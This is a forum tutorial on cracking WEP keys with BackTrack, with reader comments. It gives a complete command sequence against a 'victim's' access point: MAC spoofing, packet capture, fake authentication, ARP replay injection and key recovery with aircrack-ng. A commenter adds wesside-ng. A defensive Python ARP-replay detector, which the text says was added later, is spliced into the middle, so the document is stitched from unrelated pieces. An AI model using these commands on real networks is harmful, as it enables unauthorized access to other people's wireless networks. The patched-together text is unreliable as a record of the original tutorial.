
Cracking Wep Keys With BackTrack


By ghostghost | 168287 Reads

This is my first tutorial. I hope it helps all of you who just don't know where to start or don't know how to crack WEP.

What you will need:

  • 1 copy of BackTrack 3 newest release http://www.remote-exploit.org/backtrack.html (GOOGLE IT)
  • 1 wireless router
  • Laptop with wireless capabilities/wireless card – There are a few cards that can’t do the injection!!!
  • A secure place to work (so you don't disturb other APs)

In order to crack a WEP key you must have a large number of encrypted packets to work with. This is an unavoidable requirement if you wish to be successful. The best way to get a large number of packets is to perform an ARP request reinjection attack (otherwise known as attack -3). For this attack to produce results, there must be a client already authenticated with the AP, or connecting to the AP.
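Seen from the monitoring side, the reinjection described above leaves a clear trace: the injected frame is the same captured ciphertext every time, so its WEP IV and length never change, while an ordinary sender normally uses a fresh IV per frame. The Python detector below is an added example, not part of the original tutorial; the record layout, thresholds, BSSID and sample frames are constructed assumptions.

```python
from collections import defaultdict

# Each record: (timestamp_s, transmitter_mac, bssid, frame_len, wep_iv_hex).
# This layout is an assumption; fill it from whatever your sensor exports.

def detect_replay(frames, window_s=1.0, threshold=50):
    """Return {(transmitter, bssid): peak_count} for senders that repeat one
    (IV, length) pair at least `threshold` times inside `window_s` seconds."""
    buckets = defaultdict(list)
    for ts, tx, bssid, length, iv in frames:
        buckets[(tx, bssid, iv, length)].append(ts)

    alerts = {}
    for (tx, bssid, _iv, _length), stamps in buckets.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            # Slide the window start forward until it spans <= window_s.
            while ts - stamps[start] > window_s:
                start += 1
            count = end - start + 1
            if count >= threshold:
                alerts[(tx, bssid)] = max(alerts.get((tx, bssid), 0), count)
    return alerts


def sample_capture():
    """Constructed sample: one ordinary client and one replaying station."""
    bssid = "aa:bb:cc:dd:ee:ff"  # constructed BSSID
    # Ordinary client: a fresh IV per frame, varying lengths.
    normal = [(i * 0.1, "02:00:00:00:00:01", bssid, 80 + (i % 5) * 40, f"{i:06x}")
              for i in range(30)]
    # A few link-layer retransmissions: same IV, far below the threshold.
    retries = [(1.0 + i * 0.01, "02:00:00:00:00:01", bssid, 120, "00ffee")
               for i in range(3)]
    # Replaying station: the same frame (same IV, same length) 200 times in 1 s.
    replay = [(2.0 + i * 0.005, "00:11:22:33:44:55", bssid, 68, "a1b2c3")
              for i in range(200)]
    return normal + retries + replay


if __name__ == "__main__":
    for (tx, bssid), peak in detect_replay(sample_capture()).items():
        print(f"possible ARP replay: {tx} -> {bssid}, {peak} identical frames in window")
```

The threshold has to sit well above ordinary link-layer retransmissions, which also repeat an IV a handful of times.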


Here are some things you need to know before you get confused. When you see (device) or (bssid), you DON'T type the ( )!!!

  • (device) = your wireless card. It can be seen by typing iwconfig, e.g. eth0, eth1, ath0, ath1
  • (bssid) = the victim's BSSID. When you start airodump-ng, any AP in range will show up on the left side and will look similar to 00:11:22:33:44:55


Now, before we start, we need to make a txt file in the home folder. On the desktop you will see 2 icons, home and system. Double-click the home icon, right-click the blank white area, select create new Txt File and name it exidous or whatever you want! Click OK, then close the window.

Ok, let's start!

Commands | Meaning

* Open up 3 shell konsoles by clicking the little black box next to the start button.

* The first thing we're going to do is stop the device, aka the ethernet card

airmon-ng stop ath0

* Now we're going to put the wireless card down, so we can fake a MAC address (to see available wireless cards, type iwconfig)

ifconfig (device) down

* Ok, now just to make things simpler, so we don't have to hunt down what our MAC address is

macchanger --mac 00:11:22:33:44:55 (device)

* Now we're going to start the wireless card (make it listen for APs)

airmon-ng start (device)

* Let's start seeing what APs are there

airodump-ng (device)

* After you see all the APs, execute the following command to stop it and copy the bssid

CTRL+C, then copy the bssid of the victim

* Now on to the victim's AP (we're listening in for authentication packets)

airodump-ng -c 6 -w exidous --bssid (bssid) (device)

* Let's get on with making more Data, and start the injection process

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 (device)

* Now we're going to inject the router ***this sometimes takes a while to actually inject!

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (device)

* On to cracking the key ***AFTER GETTING AT LEAST 5,000 Data/IVs for 64 bit encryption / AFTER GETTING AT LEAST 10,000 Data/IVs for 128 bit encryption

aircrack-ng -n 64 --bssid (bssid) exidous-01.cap

* Once you crack the WEP key, you write it down and reboot to Windows. Now put it in the username and the password without the :

E.g.: WEP key = 33:C7:C6:09:30. When entered into username and password it will look like this: 33C7C60930

I hope this tut. Helped!!! If so please send $$…. JK!!! Just leave a comment and rate it!

Comments
ghost 16 years ago

Good article. Though faking the MAC address doesn't always work 100%. I set up a wireless network to play around with BT3, and I had trouble ARP injecting with a fake MAC address, then I switched it back to my original and presto, problem solved… A little advice for the article however: go more into detail with the commands, didn't feel like I got a good enough explanation of those. Good work though, keep it up.

richohealey 16 years ago

you're a paint by numbers skid.

ghost 16 years ago

Well, thanks for taking the time to look at it.. and I am going to do a second article, but it will be on how to do the Chop Chop method… and I will go a little further in detail about the commands, and other commands you can use! (Make it totally noob friendly)

Uber0n 16 years ago

This sure is useful information, but it doesn't explain how anything works. Just a step-by-step skiddie guide :|

ghost 16 years ago

Nice one, but you use the old methods; BackTrack 3 has wesside-ng

wesside-ng -i (device)

Of course you have to put the card in monitor mode, either using airmon-ng or wlanconfig

ghost 16 years ago

Great article, I was having a lot of trouble with BackTrack (I'm not that much of a Linux guy)…

ghost 15 years ago

Everybody take a good look, this is a quality example of spoon-feeding.

rated poor, for.. obvious reasons.

ghost 15 years ago

I just got my BackTrack 3 installed on my Eee PC 901 a few days ago. Too bad that the WLAN chip inside 901 isn't injection capable.

Blunt 15 years ago

Great, but with step 7 -w exdious: if you're using a live CD you need to format a USB drive with ext.3 by using mkfs.ext /dev/(your device) so you can save your IVs

-w /dev/sda1 or whatever the USB is mounted to: sdc1, sda1, hda1, whatever

ghost 15 years ago

@ Blunt "Go smoke another one!" You're completely wrong. I have never installed BackTrack 3. I have always run it from CD or USB, and have never had a problem with step 7. All you have to do is open the home folder on the desktop, right-click and make a txt file, and name it whatever you want… That is all.

ghost 14 years ago

I agree with Uber0n, I'd rather not be stuck knocking unwanted clients off my network.

ghost 14 years ago

What are some good USB wireless adapters that support injection? My netbook (Acer Aspire One) doesn't. PM if anyone knows any. In the meantime, I'll Google it. Thanks.

ghost 14 years ago

It's late to be asking this, but did mirage find any USBs for injection that function well with Acers?

Also, it might be slower, but you can still crack it with Acers. Highly suggest using password files though.

Also, check into airbase for Acer tops. It proves useful sometimes.

Wish I could find an easier way to see what computer bssid's are connected to the router though….